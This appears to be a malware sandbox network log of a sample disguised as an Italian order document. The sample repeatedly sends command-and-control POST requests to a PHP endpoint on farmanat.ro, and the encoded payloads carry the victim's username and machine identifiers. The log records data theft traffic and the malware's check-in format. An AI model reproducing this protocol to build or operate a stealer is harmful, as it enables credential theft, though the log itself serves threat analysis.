Nov 25, 2021 10:52:16.719602108 CET	6992	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:16.753187895 CET	6992	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:16.805646896 CET	6992	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
486	192.168.11.20	50330	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:17.227828979 CET	6993	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:17.262125015 CET	6993	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:17.314026117 CET	6994	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
487	192.168.11.20	50331	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:17.758847952 CET	6994	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:17.792740107 CET	6994	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:17.842144966 CET	6995	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
488	192.168.11.20	50332	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:18.265321016 CET	6996	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:18.298950911 CET	6996	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:18.348356009 CET	6996	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
489	192.168.11.20	50333	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:18.757230997 CET	6997	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:18.791583061 CET	6997	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:18.841252089 CET	6998	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.11.20	49885	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:33.088495016 CET	6378	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:33.122982025 CET	6378	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:33.174014091 CET	6378	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
490	192.168.11.20	50334	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:19.260157108 CET	6998	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:19.294414997 CET	6998	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:19.345704079 CET	6999	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
491	192.168.11.20	50335	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:19.780977964 CET	7000	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:19.814631939 CET	7000	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:19.863940954 CET	7000	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
492	192.168.11.20	50336	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:20.285330057 CET	7001	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:20.319498062 CET	7001	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:20.387083054 CET	7002	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
493	192.168.11.20	50337	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:20.716730118 CET	7002	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:20.750154972 CET	7002	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:20.803515911 CET	7003	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
494	192.168.11.20	50338	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:21.237790108 CET	7004	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:21.271239042 CET	7004	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:21.325181961 CET	7004	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
495	192.168.11.20	50339	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:21.714998007 CET	7005	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:21.749106884 CET	7005	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:21.807549953 CET	7005	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
496	192.168.11.20	50340	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:22.226974964 CET	7006	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:22.260694981 CET	7006	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:22.313255072 CET	7007	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
497	192.168.11.20	50341	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:22.744389057 CET	7008	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:22.778665066 CET	7008	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:22.829025030 CET	7008	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
498	192.168.11.20	50342	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:23.270426035 CET	7009	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:23.303985119 CET	7009	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:23.354069948 CET	7009	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
499	192.168.11.20	50343	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:23.770524979 CET	7010	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:23.804945946 CET	7010	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:23.855377913 CET	7011	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49824	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:03.269522905 CET	6306	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:03.302797079 CET	6306	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:03.352428913 CET	6306	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.11.20	49886	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:33.744999886 CET	6379	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:33.778672934 CET	6379	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:33.827759027 CET	6380	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
500	192.168.11.20	50344	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:24.270030022 CET	7012	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:24.303558111 CET	7012	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:24.353456020 CET	7012	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
501	192.168.11.20	50345	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:24.703352928 CET	7013	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:24.736711979 CET	7013	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:24.805270910 CET	7013	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
502	192.168.11.20	50346	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:25.197757959 CET	7014	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:25.232018948 CET	7014	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
